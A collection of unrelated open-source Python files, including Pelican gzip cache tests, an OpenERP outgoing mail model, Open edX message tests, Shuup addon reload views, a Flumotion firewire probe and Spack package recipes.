self.assertTrue(gzip_cache.should_compress('foo.txt', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('foo.gz', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('bar.png', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('baz.mp3', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('foo.mov', user_exclude_types))
user_exclude_types = ('.html', '.xyz')
self.assertFalse(gzip_cache.should_compress('foo.html', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('bar.xyz', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('foo.gz', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('baz.js', user_exclude_types))
def test_should_overwrite(self):
# Default to false if GZIP_CACHE_OVERWRITE is not set
settings = { }
self.assertFalse(gzip_cache.should_overwrite(settings))
settings = { 'GZIP_CACHE_OVERWRITE': False }
self.assertFalse(gzip_cache.should_overwrite(settings))
settings = { 'GZIP_CACHE_OVERWRITE': True }
self.assertTrue(gzip_cache.should_overwrite(settings))
def test_creates_gzip_file(self):
# A file matching the input filename with a .gz extension is created.
# The plugin walks over the output content after the finalized signal
# so it is safe to assume that the file exists (otherwise walk would
# not report it). Therefore, create a dummy file to use.
with temporary_folder() as tempdir:
_, a_html_filename = tempfile.mkstemp(suffix='.html', dir=tempdir)
with open(a_html_filename, 'w') as f:
f.write('A' * 24) # under this length, compressing is useless and create_gzip_file will not create any file
gzip_cache.create_gzip_file(a_html_filename, False)
self.assertTrue(os.path.exists(a_html_filename + '.gz'))
def test_creates_same_gzip_file(self):
# Should create the same gzip file from the same contents.
# gzip will create a slightly different file because it includes
# a timestamp in the compressed file by default. This can cause
# problems for some caching strategies.
with temporary_folder() as tempdir:
_, a_html_filename = tempfile.mkstemp(suffix='.html', dir=tempdir)
with open(a_html_filename, 'w') as f:
f.write('A' * 24) # under this length, compressing is useless and create_gzip_file will not create any file
a_gz_filename = a_html_filename + '.gz'
gzip_cache.create_gzip_file(a_html_filename, False)
gzip_hash = get_md5(a_gz_filename)
time.sleep(1)
gzip_cache.create_gzip_file(a_html_filename, False)
self.assertEqual(gzip_hash, get_md5(a_gz_filename))
def test_overwrites_gzip_file(self):
# A file matching the input filename with a .gz extension is not created.
# The plugin walks over the output content after the finalized signal
# so it is safe to assume that the file exists (otherwise walk would
# not report it). Therefore, create a dummy file to use.
with temporary_folder() as tempdir:
_, a_html_filename = tempfile.mkstemp(suffix='.html', dir=tempdir)
gzip_cache.create_gzip_file(a_html_filename, True)
self.assertFalse(os.path.exists(a_html_filename + '.gz'))
def get_md5(filepath):
with open(filepath, 'rb') as fh:
return md5(fh.read()).hexdigest()
|
import base64
import logging
import re
from urllib import urlencode
from urlparse import urljoin
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.osv.orm import except_orm
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class mail_mail(osv.Model):
""" Model holding RFC2822 email messages to send. This model also provides
facilities to queue and send new email messages. """
_name = 'mail.mail'
_description = 'Outgoing Mails'
_inherits = {'mail.message': 'mail_message_id'}
_order = 'id desc'
_columns = {
'mail_message_id': fields.many2one('mail.message', 'Message', required=True, ondelete='cascade'),
'mail_server_id': fields.many2one('ir.mail_server', 'Outgoing mail server', readonly=1),
'state': fields.selection([
('outgoing', 'Outgoing'),
('sent', 'Sent'),
('received', 'Received'),
('exception', 'Delivery Failed'),
('cancel', 'Cancelled'),
], 'Status', readonly=True),
'auto_delete': fields.boolean('Auto Delete',
help="Permanently delete this email after sending it, to save space"),
'references': fields.text('References', help='Message references, such as identifiers of previous messages', readonly=1),
'email_from': fields.char('From', help='Message sender, taken from user preferences.'),
'email_to': fields.text('To', help='Message recipients'),
'email_cc': fields.char('Cc', help='Carbon copy message recipients'),
'reply_to': fields.char('Reply-To', help='Preferred response address for the message'),
'body_html': fields.text('Rich-text Contents', help="Rich-text/HTML message"),
# Auto-detected based on create() - if 'mail_message_id' was passed then this mail is a notification
# and during unlink() we will not cascade delete the parent and its attachments
'notification': fields.boolean('Is Notification')
}
def _get_default_from(self, cr, uid, context=None):
this = self.pool.get('res.users').browse(cr, uid, uid, context=context)
if this.alias_domain:
return '%s@%s' % (this.alias_name, this.alias_domain)
elif this.email:
return this.email
raise osv.except_osv(_('Invalid Action!'), _("Unable to send email, please configure the sender's email address or alias."))
_defaults = {
'state': 'outgoing',
'email_from': lambda self, cr, uid, ctx=None: self._get_default_from(cr, uid, ctx),
}
def default_get(self, cr, uid, fields, context=None):
# protection for `default_type` values leaking from menu action context (e.g. for invoices)
# To remove when automatic context propagation is removed in web client
if context and context.get('default_type') and context.get('default_type') not in self._all_columns['type'].column.selection:
context = dict(context, default_type=None)
return super(mail_mail, self).default_get(cr, uid, fields, context=context)
def create(self, cr, uid, values, context=None):
if 'notification' not in values and values.get('mail_message_id'):
values['notification'] = True
return super(mail_mail, self).create(cr, uid, values, context=context)
def unlink(self, cr, uid, ids, context=None):
# cascade-delete the parent message for all mails that are not created for a notification
ids_to_cascade = self.search(cr, uid, [('notification', '=', False), ('id', 'in', ids)])
parent_msg_ids = [m.mail_message_id.id for m in self.browse(cr, uid, ids_to_cascade, context=context)]
res = super(mail_mail, self).unlink(cr, uid, ids, context=context)
self.pool.get('mail.message').unlink(cr, uid, parent_msg_ids, context=context)
return res
def mark_outgoing(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'outgoing'}, context=context)
def cancel(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'cancel'}, context=context)
def process_email_queue(self, cr, uid, ids=None, context=None):
"""Send immediately queued messages, committing after each
message is sent - this is not transactional and should
not be called during another transaction!
:param list ids: optional list of emails ids to send. If passed
no search is performed, and these ids are used
instead.
:param dict context: if a 'filters' key is present in context,
this value will be used as an additional
filter to further restrict the outgoing
messages to send (by default all 'outgoing'
messages are sent).
"""
if context is None:
context = {}
if not ids:
filters = ['&', ('state', '=', 'outgoing'), ('type', '=', 'email')]
if 'filters' in context:
filters.extend(context['filters'])
ids = self.search(cr, uid, filters, context=context)
res = None
try:
# Force auto-commit - this is meant to be called by
# the scheduler, and we can't allow rolling back the status
# of previously sent emails!
res = self.send(cr, uid, ids, auto_commit=True, context=context)
except Exception:
_logger.exception("Failed processing mail queue")
return res
def _postprocess_sent_message(self, cr, uid, mail, context=None):
"""Perform any post-processing necessary after sending ``mail``
successfully, including deleting it completely along with its
attachment if the ``auto_delete`` flag of the mail was set.
Overridden by subclasses for extra post-processing behaviors.
:param browse_record mail: the mail that was just sent
:return: True
"""
if mail.auto_delete:
# done with SUPERUSER_ID to avoid giving large unlink access rights
self.unlink(cr, SUPERUSER_ID, [mail.id], context=context)
return True
def send_get_mail_subject(self, cr, uid, mail, force=False, partner=None, context=None):
""" If subject is void and record_name defined: '<Author> posted on <Resource>'
:param boolean force: force the subject replacement
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if force or (not mail.subject and mail.model and mail.res_id):
return 'Re: %s' % (mail.record_name)
return mail.subject
def send_get_mail_body(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email body. The main purpose of this method
is to be inherited by Portal, to add a link for signing in, in
each notification email a partner receives.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = mail.body_html
# partner is a user, link to a related document (incentive to install portal)
if partner and partner.user_ids and mail.model and mail.res_id \
and self.check_access_rights(cr, partner.user_ids[0].id, 'read', raise_exception=False):
related_user = partner.user_ids[0]
try:
self.pool.get(mail.model).check_access_rule(cr, related_user.id, [mail.res_id], 'read', context=context)
base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# the parameters to encode for the query and fragment part of url
query = {'db': cr.dbname}
fragment = {
'login': related_user.login,
'model': mail.model,
'id': mail.res_id,
}
url = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
text = _("""<p>Access this document <a href="%s">directly in OpenERP</a></p>""") % url
body = tools.append_content_to_html(body, ("<div><p>%s</p></div>" % text), plaintext=False)
except except_orm, e:
pass
return body
def send_get_mail_reply_to(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email reply_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if mail.reply_to:
return mail.reply_to
email_reply_to = False
# if model and res_id: try to use ``message_get_reply_to`` that returns the document alias
if mail.model and mail.res_id and hasattr(self.pool.get(mail.model), 'message_get_reply_to'):
email_reply_to = self.pool.get(mail.model).message_get_reply_to(cr, uid, [mail.res_id], context=context)[0]
# no alias reply_to -> reply_to will be the email_from, only the email part
if not email_reply_to and mail.email_from:
emails = tools.email_split(mail.email_from)
if emails:
email_reply_to = emails[0]
# format 'Document name <email_address>'
if email_reply_to and mail.model and mail.res_id:
document_name = self.pool.get(mail.model).name_get(cr, SUPERUSER_ID, [mail.res_id], context=context)[0]
if document_name:
# sanitize document name
sanitized_doc_name = re.sub(r'[^\w+.]+', '-', document_name[1])
# generate reply to
email_reply_to = _('"Followers of %s" <%s>') % (sanitized_doc_name, email_reply_to)
return email_reply_to
def send_get_email_dict(self, cr, uid, mail, partner=None, context=None):
""" Return a dictionary for specific email values, depending on a
partner, or generic to the whole recipients given by mail.email_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = self.send_get_mail_body(cr, uid, mail, partner=partner, context=context)
subject = self.send_get_mail_subject(cr, uid, mail, partner=partner, context=context)
reply_to = self.send_get_mail_reply_to(cr, uid, mail, partner=partner, context=context)
body_alternative = tools.html2plaintext(body)
# generate email_to, heuristic:
# 1. if 'partner' is specified and there is a related document: Followers of 'Doc' <email>
# 2. if 'partner' is specified, but no related document: Partner Name <email>
# 3; fallback on mail.email_to that we split to have an email addresses list
if partner and mail.record_name:
sanitized_record_name = re.sub(r'[^\w+.]+', '-', mail.record_name)
email_to = [_('"Followers of %s" <%s>') % (sanitized_record_name, partner.email)]
elif partner:
email_to = ['%s <%s>' % (partner.name, partner.email)]
else:
email_to = tools.email_split(mail.email_to)
return {
'body': body,
'body_alternative': body_alternative,
'subject': subject,
'email_to': email_to,
'reply_to': reply_to,
}
def send(self, cr, uid, ids, auto_commit=False, recipient_ids=None, context=None):
""" Sends the selected emails immediately, ignoring their current
state (mails that have already been sent should not be passed
unless they should actually be re-sent).
Emails successfully delivered are marked as 'sent', and those
that fail to be deliver are marked as 'exception', and the
corresponding error mail is output in the server logs.
:param bool auto_commit: whether to force a commit of the mail status
after sending each mail (meant only for scheduler processing);
should never be True during normal transactions (default: False)
:param list recipient_ids: specific list of res.partner recipients.
If set, one email is sent to each partner. Its is possible to
tune the sent email through ``send_get_mail_body`` and ``send_get_mail_subject``.
If not specified, one email is sent to mail_mail.email_to.
:return: True
"""
ir_mail_server = self.pool.get('ir.mail_server')
for mail in self.browse(cr, uid, ids, context=context):
try:
# handle attachments
attachments = []
for attach in mail.attachment_ids:
attachments.append((attach.datas_fname, base64.b64decode(attach.datas)))
# specific behavior to customize the send email for notified partners
email_list = []
if recipient_ids:
for partner in self.pool.get('res.partner').browse(cr, SUPERUSER_ID, recipient_ids, context=context):
email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))
else:
email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))
# build an RFC2822 email.message.Message object and send it without queuing
for email in email_list:
msg = ir_mail_server.build_email(
email_from = mail.email_from,
email_to = email.get('email_to'),
subject = email.get('subject'),
body = email.get('body'),
body_alternative = email.get('body_alternative'),
email_cc = tools.email_split(mail.email_cc),
reply_to = email.get('reply_to'),
attachments = attachments,
message_id = mail.message_id,
references = mail.references,
object_id = mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),
subtype = 'html',
subtype_alternative = 'plain')
res = ir_mail_server.send_email(cr, uid, msg,
mail_server_id=mail.mail_server_id.id, context=context)
if res:
mail.write({'state': 'sent', 'message_id': res})
mail_sent = True
else:
mail.write({'state': 'exception'})
mail_sent = False
# /!\ can't use mail.state here, as mail.refresh() will cause an error
# see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1
if mail_sent:
self._postprocess_sent_message(cr, uid, mail, context=context)
except Exception:
_logger.exception('failed sending mail.mail %s', mail.id)
mail.write({'state': 'exception'})
if auto_commit == True:
cr.commit()
return True
|
"""
Unit tests for user messages.
"""
import warnings
import ddt
from django.contrib.messages.middleware import MessageMiddleware
from django.test import RequestFactory, TestCase
from common.test.utils import normalize_repr
from openedx.core.djangolib.markup import HTML, Text
from common.djangoapps.student.tests.factories import UserFactory
from ..user_messages import PageLevelMessages, UserMessageType
TEST_MESSAGE = 'Test message'
@ddt.ddt
class UserMessagesTestCase(TestCase):
"""
Unit tests for page level user messages.
"""
def setUp(self):
super().setUp()
self.student = UserFactory.create()
self.request = RequestFactory().request()
self.request.session = {}
self.request.user = self.student
MessageMiddleware().process_request(self.request)
@ddt.data(
('Rock & Roll', '<div class="message-content">Rock & Roll</div>'),
(Text('Rock & Roll'), '<div class="message-content">Rock & Roll</div>'),
(HTML('<p>Hello, world!</p>'), '<div class="message-content"><p>Hello, world!</p></div>')
)
@ddt.unpack
def test_message_escaping(self, message, expected_message_html):
"""
Verifies that a user message is escaped correctly.
"""
PageLevelMessages.register_user_message(self.request, UserMessageType.INFO, message)
messages = list(PageLevelMessages.user_messages(self.request))
assert len(messages) == 1
assert messages[0].message_html == expected_message_html
@ddt.data(
(UserMessageType.ERROR, 'alert-danger', 'fa fa-warning'),
(UserMessageType.INFO, 'alert-info', 'fa fa-bullhorn'),
(UserMessageType.SUCCESS, 'alert-success', 'fa fa-check-circle'),
(UserMessageType.WARNING, 'alert-warning', 'fa fa-warning'),
)
@ddt.unpack
def test_message_icon(self, message_type, expected_css_class, expected_icon_class):
"""
Verifies that a user message returns the correct CSS and icon classes.
"""
PageLevelMessages.register_user_message(self.request, message_type, TEST_MESSAGE)
messages = list(PageLevelMessages.user_messages(self.request))
assert len(messages) == 1
assert messages[0].css_class == expected_css_class
assert messages[0].icon_class == expected_icon_class
@ddt.data(
(normalize_repr(PageLevelMessages.register_error_message), UserMessageType.ERROR),
(normalize_repr(PageLevelMessages.register_info_message), UserMessageType.INFO),
(normalize_repr(PageLevelMessages.register_success_message), UserMessageType.SUCCESS),
(normalize_repr(PageLevelMessages.register_warning_message), UserMessageType.WARNING),
)
@ddt.unpack
def test_message_type(self, register_message_function, expected_message_type):
"""
Verifies that each user message function returns the correct type.
"""
register_message_function(self.request, TEST_MESSAGE)
messages = list(PageLevelMessages.user_messages(self.request))
assert len(messages) == 1
assert messages[0].type == expected_message_type
def global_message_count(self):
"""
Count the number of times the global message appears in the user messages.
"""
expected_html = """<div class="message-content">I <3 HTML-escaping</div>"""
messages = list(PageLevelMessages.user_messages(self.request))
return len(list(msg for msg in messages if expected_html in msg.message_html))
def test_global_message_off_by_default(self):
"""Verifies feature toggle."""
with self.settings(
GLOBAL_NOTICE_ENABLED=False,
GLOBAL_NOTICE_MESSAGE="I <3 HTML-escaping",
GLOBAL_NOTICE_TYPE='WARNING'
):
# Missing when feature disabled
assert self.global_message_count() == 0
def test_global_message_persistent(self):
"""Verifies global message is always included, when enabled."""
with self.settings(
GLOBAL_NOTICE_ENABLED=True,
GLOBAL_NOTICE_MESSAGE="I <3 HTML-escaping",
GLOBAL_NOTICE_TYPE='WARNING'
):
# Present with no other setup
assert self.global_message_count() == 1
# Present when other messages are present
PageLevelMessages.register_user_message(self.request, UserMessageType.INFO, "something else")
assert self.global_message_count() == 1
def test_global_message_error_isolation(self):
"""Verifies that any setting errors don't break the page, or other messages."""
with self.settings(
GLOBAL_NOTICE_ENABLED=True,
GLOBAL_NOTICE_MESSAGE=ThrowingMarkup(), # force an error
GLOBAL_NOTICE_TYPE='invalid'
):
PageLevelMessages.register_user_message(self.request, UserMessageType.WARNING, "something else")
# Doesn't throw, or even interfere with other messages,
# when given invalid settings
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
messages = list(PageLevelMessages.user_messages(self.request))
assert len(w) == 1
assert str(w[0].message) == "Could not register global notice: Exception('Some random error')"
assert len(messages) == 1
assert "something else" in messages[0].message_html
class ThrowingMarkup:
"""Class that raises an exception if markupsafe tries to get HTML from it."""
def __html__(self):
raise Exception("Some random error")
|
from . import CuraProfileReader
from UM.i18n import i18nCatalog
catalog = i18nCatalog("cura")
def getMetaData():
return {
"plugin": {
"name": catalog.i18nc("@label", "Cura Profile Reader"),
"author": "Ultimaker",
"version": "1.0",
"description": catalog.i18nc("@info:whatsthis", "Provides support for importing Cura profiles."),
"api": 3
},
"profile_reader": [
{
"extension": "curaprofile",
"description": catalog.i18nc("@item:inlistbox", "Cura Profile")
}
]
}
def register(app):
return { "profile_reader": CuraProfileReader.CuraProfileReader() }
|
from __future__ import unicode_literals
import time
from django import forms
from django.conf import settings
from django.core.management import call_command
from django.http.response import HttpResponse, JsonResponse
from django.utils.translation import ugettext_lazy as _
from django.views.generic import FormView
from six import StringIO
from shuup.addons.manager import get_enabled_addons
from shuup.addons.reloader import get_reload_method_classes
from shuup.apps.settings import reload_apps
from shuup.utils.excs import Problem
from shuup.utils.iterables import first
class ReloadMethodForm(forms.Form):
def get_viable_reload_methods(self):
for klass in get_reload_method_classes():
rm = klass()
if rm.is_viable():
yield rm
def __init__(self, **kwargs):
super(ReloadMethodForm, self).__init__(**kwargs)
self.reload_methods = list(self.get_viable_reload_methods())
if not self.reload_methods:
raise Problem(_("There are no viable reload methods available. Please contact your system administrator."))
self.fields["reload_method"] = forms.ChoiceField(
choices=[(rm.identifier, rm.title) for rm in self.reload_methods],
label=_("Reload Method"),
initial=self.reload_methods[0].identifier,
widget=forms.RadioSelect
)
def get_selected_reload_method(self):
return first(rm for rm in self.reload_methods if rm.identifier == self.cleaned_data["reload_method"])
def finalize_installation_for_enabled_apps():
out = StringIO()
enabled_addons = get_enabled_addons(settings.SHUUP_ENABLED_ADDONS_FILE)
new_apps = [app for app in enabled_addons if app not in settings.INSTALLED_APPS]
if new_apps:
out.write("Enabling new addons: %s" % new_apps)
settings.INSTALLED_APPS += type(settings.INSTALLED_APPS)(new_apps)
reload_apps()
call_command("migrate", "--noinput", "--no-color", stdout=out)
call_command("collectstatic", "--noinput", "--no-color", stdout=out)
return out.getvalue()
class ReloadView(FormView):
template_name = "shuup/admin/addons/reload.jinja"
form_class = ReloadMethodForm
def form_valid(self, form):
reloader = form.get_selected_reload_method()
reloader.execute()
return HttpResponse(_("Reloading.")) # This might not reach the user...
def get(self, request, *args, **kwargs):
if request.GET.get("ping"):
return JsonResponse({"pong": time.time()})
elif request.GET.get("finalize"):
return JsonResponse({"message": finalize_installation_for_enabled_apps()})
return super(ReloadView, self).get(request, *args, **kwargs)
|
"""Offers a simple XML-RPC dispatcher for django_xmlrpc
Author::
Graham Binns
Credit must go to Brendan W. McAdams <brendan.mcadams@thewintergrp.com>, who
posted the original SimpleXMLRPCDispatcher to the Django wiki:
http://code.djangoproject.com/wiki/XML-RPC
New BSD License
===============
Copyright (c) 2007, Graham Binns http://launchpad.net/~codedragon
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the <ORGANIZATION> nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from inspect import getargspec
from SimpleXMLRPCServer import SimpleXMLRPCDispatcher
from django.conf import settings
DEBUG = hasattr(settings, 'XMLRPC_DEBUG') and settings.XMLRPC_DEBUG
class DjangoXMLRPCDispatcher(SimpleXMLRPCDispatcher):
"""A simple XML-RPC dispatcher for Django.
Subclassess SimpleXMLRPCServer.SimpleXMLRPCDispatcher for the purpose of
overriding certain built-in methods (it's nicer than monkey-patching them,
that's for sure).
"""
def system_methodSignature(self, method):
"""Returns the signature details for a specified method
method
The name of the XML-RPC method to get the details for
"""
# See if we can find the method in our funcs dict
# TODO: Handle this better: We really should return something more
# formal than an AttributeError
func = self.funcs[method]
try:
sig = func._xmlrpc_signature
except:
sig = {
'returns': 'string',
'args': ['string' for arg in getargspec(func)[0]],
}
return [sig['returns']] + sig['args']
|
import wizard
|
import logging
from lxml import etree, html
from odoo import api, models
_logger = logging.getLogger(__name__)
class IrFieldsConverter(models.AbstractModel):
_inherit = "ir.fields.converter"
@api.model
def text_from_html(self, html_content, max_words=None, max_chars=None,
ellipsis=u"…", fail=False):
"""Extract text from an HTML field in a generator.
:param str html_content:
HTML contents from where to extract the text.
:param int max_words:
Maximum amount of words allowed in the resulting string.
:param int max_chars:
Maximum amount of characters allowed in the resulting string. If
you apply this limit, beware that the last word could get cut in an
unexpected place.
:param str ellipsis:
Character(s) to be appended to the end of the resulting string if
it gets truncated after applying limits set in :param:`max_words`
or :param:`max_chars`. If you want nothing applied, just set an
empty string.
:param bool fail:
If ``True``, exceptions will be raised. Otherwise, an empty string
will be returned on failure.
"""
# Parse HTML
try:
doc = html.fromstring(html_content)
except (TypeError, etree.XMLSyntaxError, etree.ParserError):
if fail:
raise
else:
_logger.exception("Failure parsing this HTML:\n%s",
html_content)
return ""
# Get words
words = u"".join(doc.xpath("//text()")).split()
# Truncate words
suffix = max_words and len(words) > max_words
if max_words:
words = words[:max_words]
# Get text
text = u" ".join(words)
# Truncate text
suffix = suffix or max_chars and len(text) > max_chars
if max_chars:
text = text[:max_chars - (len(ellipsis) if suffix else 0)].strip()
# Append ellipsis if needed
if suffix:
text += ellipsis
return text
|
"""
Test the style of toggle and radio buttons inside a palette. The buttons
contains only an icon and should be rendered similarly to the toolbar
controls. Ticket #2855.
"""
from gi.repository import Gtk
from sugar3.graphics.palette import Palette
from sugar3.graphics.icon import Icon
from sugar3.graphics import style
import common
test = common.TestPalette()
palette = Palette('Test radio and toggle')
test.set_palette(palette)
box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
toggle = Gtk.ToggleButton()
icon = Icon(icon_name='go-previous', pixel_size=style.STANDARD_ICON_SIZE)
toggle.set_image(icon)
box.pack_start(toggle, False, False, 0)
toggle.show()
radio = Gtk.RadioButton()
icon = Icon(icon_name='go-next', pixel_size=style.STANDARD_ICON_SIZE)
radio.set_image(icon)
radio.set_mode(False)
box.pack_start(radio, False, False, 0)
radio.show()
palette.set_content(box)
box.show()
if __name__ == '__main__':
common.main(test)
|
import gobject
import gst
import gst.interfaces
from twisted.internet.threads import deferToThread
from twisted.internet import defer
from flumotion.common import gstreamer, errors, log, messages
from flumotion.common.i18n import N_, gettexter
from flumotion.twisted import defer as fdefer
from flumotion.worker.checks import check
__version__ = "$Rev$"
T_ = gettexter()
class BusResolution(fdefer.Resolution):
pipeline = None
signal_id = None
def cleanup(self):
if self.pipeline:
if self.signal_id:
self.pipeline.get_bus().remove_signal_watch()
self.pipeline.get_bus().disconnect(self.signal_id)
self.signal_id = None
self.pipeline.set_state(gst.STATE_NULL)
self.pipeline = None
def do_element_check(pipeline_str, element_name, check_proc, state=None,
set_state_deferred=False):
"""
Parse the given pipeline and set it to the given state.
When the bin reaches that state, perform the given check function on the
element with the given name.
@param pipeline_str: description of the pipeline used to test
@param element_name: name of the element being checked
@param check_proc: a function to call with the GstElement as argument.
@param state: an unused keyword parameter that will be removed when
support for GStreamer 0.8 is dropped.
@param set_state_deferred: a flag to say whether the set_state is run in
a deferToThread
@type set_state_deferred: bool
@returns: a deferred that will fire with the result of check_proc, or
fail.
@rtype: L{twisted.internet.defer.Deferred}
"""
def run_check(pipeline, resolution):
element = pipeline.get_by_name(element_name)
try:
retval = check_proc(element)
resolution.callback(retval)
except check.CheckProcError, e:
log.debug('check', 'CheckProcError when running %r: %r',
check_proc, e.data)
resolution.errback(errors.RemoteRunError(e.data))
except Exception, e:
log.debug('check', 'Unhandled exception while running %r: %r',
check_proc, e)
resolution.errback(errors.RemoteRunError(
log.getExceptionMessage(e)))
# set pipeline state to NULL so worker does not consume
# unnecessary resources
pipeline.set_state(gst.STATE_NULL)
def message_rcvd(bus, message, pipeline, resolution):
t = message.type
if t == gst.MESSAGE_STATE_CHANGED:
if message.src == pipeline:
old, new, pending = message.parse_state_changed()
if new == gst.STATE_PLAYING:
run_check(pipeline, resolution)
elif t == gst.MESSAGE_ERROR:
gerror, debug = message.parse_error()
# set pipeline state to NULL so worker does not consume
# unnecessary resources
pipeline.set_state(gst.STATE_NULL)
resolution.errback(errors.GStreamerGstError(
message.src, gerror, debug))
elif t == gst.MESSAGE_EOS:
resolution.errback(errors.GStreamerError(
"Unexpected end of stream"))
else:
log.debug('check', 'message: %s: %s:' % (
message.src.get_path_string(),
message.type.value_nicks[1]))
if message.structure:
log.debug('check', 'message: %s' %
message.structure.to_string())
else:
log.debug('check', 'message: (no structure)')
return True
resolution = BusResolution()
log.debug('check', 'parsing pipeline %s' % pipeline_str)
try:
pipeline = gst.parse_launch(pipeline_str)
log.debug('check', 'parsed pipeline %s' % pipeline_str)
except gobject.GError, e:
resolution.errback(errors.GStreamerError(e.message))
return resolution.d
bus = pipeline.get_bus()
bus.add_signal_watch()
signal_id = bus.connect('message', message_rcvd, pipeline, resolution)
resolution.signal_id = signal_id
resolution.pipeline = pipeline
log.debug('check', 'setting state to playing')
if set_state_deferred:
d = deferToThread(pipeline.set_state, gst.STATE_PLAYING)
def stateChanged(res):
return resolution.d
d.addCallback(stateChanged)
return d
else:
pipeline.set_state(gst.STATE_PLAYING)
return resolution.d
def check1394(mid, guid):
"""
Probe the firewire device.
Return a deferred firing a result.
The result is either:
- succesful, with a None value: no device found
- succesful, with a dictionary of width, height, and par as a num/den pair
- failed
@param mid: the id to set on the message.
@param guid: the id of the selected device.
@rtype: L{twisted.internet.defer.Deferred} of
L{flumotion.common.messages.Result}
"""
result = messages.Result()
def do_check(demux):
pad = demux.get_pad('video')
if not pad or pad.get_negotiated_caps() == None:
raise errors.GStreamerError('Pipeline failed to negotiate?')
caps = pad.get_negotiated_caps()
s = caps.get_structure(0)
w = s['width']
h = s['height']
par = s['pixel-aspect-ratio']
# FIXME: not a good idea to reuse the result name which
# also exists in the parent context.
# pychecker should warn; however it looks like
# the parent result doesn't get stored as name,
# but instead with STORE_DEREF
result = dict(width=w, height=h, par=(par.num, par.denom))
log.debug('check', 'returning dict %r' % result)
return result
pipeline = \
'dv1394src guid=%s ! dvdemux name=demux .video ! fakesink' % guid
d = do_element_check(pipeline, 'demux', do_check)
def errbackResult(failure):
log.debug('check', 'returning failed Result, %r' % failure)
m = None
if failure.check(errors.GStreamerGstError):
source, gerror, debug = failure.value.args
log.debug('check', 'GStreamer GError: %s (debug: %s)' % (
gerror.message, debug))
if gerror.domain == "gst-resource-error-quark":
if gerror.code == int(gst.RESOURCE_ERROR_NOT_FOUND):
# dv1394src was fixed after gst-plugins-good 0.10.2
# to distinguish NOT_FOUND and OPEN_READ
version = gstreamer.get_plugin_version('1394')
if version >= (0, 10, 0, 0) and version <= (0, 10, 2, 0):
m = messages.Error(T_(
N_("Could not find or open the Firewire device. "
"Check the device node and its permissions.")))
else:
m = messages.Error(T_(
N_("No Firewire device found.")))
elif gerror.code == int(gst.RESOURCE_ERROR_OPEN_READ):
m = messages.Error(T_(
N_("Could not open Firewire device for reading. "
"Check permissions on the device.")))
if not m:
m = check.handleGStreamerDeviceError(failure, 'Firewire',
mid=mid)
if not m:
m = messages.Error(T_(N_("Could not probe Firewire device.")),
debug=check.debugFailure(failure))
m.id = mid
result.add(m)
return result
d.addCallback(check.callbackResult, result)
d.addErrback(errbackResult)
return d
|
from spack import *
class Libice(AutotoolsPackage):
"""libICE - Inter-Client Exchange Library."""
homepage = "http://cgit.freedesktop.org/xorg/lib/libICE"
url = "https://www.x.org/archive/individual/lib/libICE-1.0.9.tar.gz"
version('1.0.9', '95812d61df8139c7cacc1325a26d5e37')
depends_on('xproto', type='build')
depends_on('xtrans', type='build')
depends_on('pkg-config@0.9.0:', type='build')
depends_on('util-macros', type='build')
|
from spack import *
class FontIsasMisc(Package):
"""X.org isas-misc font."""
homepage = "http://cgit.freedesktop.org/xorg/font/isas-misc"
url = "https://www.x.org/archive/individual/font/font-isas-misc-1.0.3.tar.gz"
version('1.0.3', 'ecc3b6fbe8f5721ddf5c7fc66f73e76f')
depends_on('font-util')
depends_on('fontconfig', type='build')
depends_on('mkfontdir', type='build')
depends_on('bdftopcf', type='build')
depends_on('pkg-config@0.9.0:', type='build')
depends_on('util-macros', type='build')
def install(self, spec, prefix):
configure('--prefix={0}'.format(prefix))
make()
make('install')
# `make install` copies the files to the font-util installation.
# Create a fake directory to convince Spack that we actually
# installed something.
